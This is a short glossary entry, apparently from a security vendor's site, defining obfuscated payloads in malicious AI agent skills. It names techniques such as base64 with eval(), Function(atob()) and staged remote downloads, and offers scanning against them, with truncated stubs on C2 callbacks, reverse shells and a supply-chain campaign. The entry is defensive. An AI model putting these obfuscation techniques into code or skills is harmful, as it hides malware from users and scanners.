TrustSkills
BlogCompareGlossaryDetections

Definition

Obfuscated payload

Malicious code that is deliberately encoded or wrapped to avoid detection by scanners that rely on keyword or hash matching. Common obfuscation techniques in AI agent skill attacks include base64 encoding with eval() or exec(), nested function constructors (Function(atob())), and staged payloads that download the malicious code from a remote server at runtime rather than including it in the skill package. TrustSkills checks for obfuscated payload patterns as part of its standard scan.

How TrustSkills detects this

TrustSkills scans OpenClaw and ClawHub skills for obfuscated payload patterns before you install them. The scanner returns plain-English findings — no CVE IDs, no security jargon — with a risk level and a clear explanation of what was found.

Scan a skill freeHow we detect obfuscated payload

Related terms

C2 callback

A Command and Control (C2) callback is a network connection from a compromised system back to an att

Reverse shell

A technique where a compromised system initiates an outbound connection to an attacker-controlled se

ClawHavoc

A coordinated supply chain attack campaign that planted 1,184 malicious skills across 12 publisher a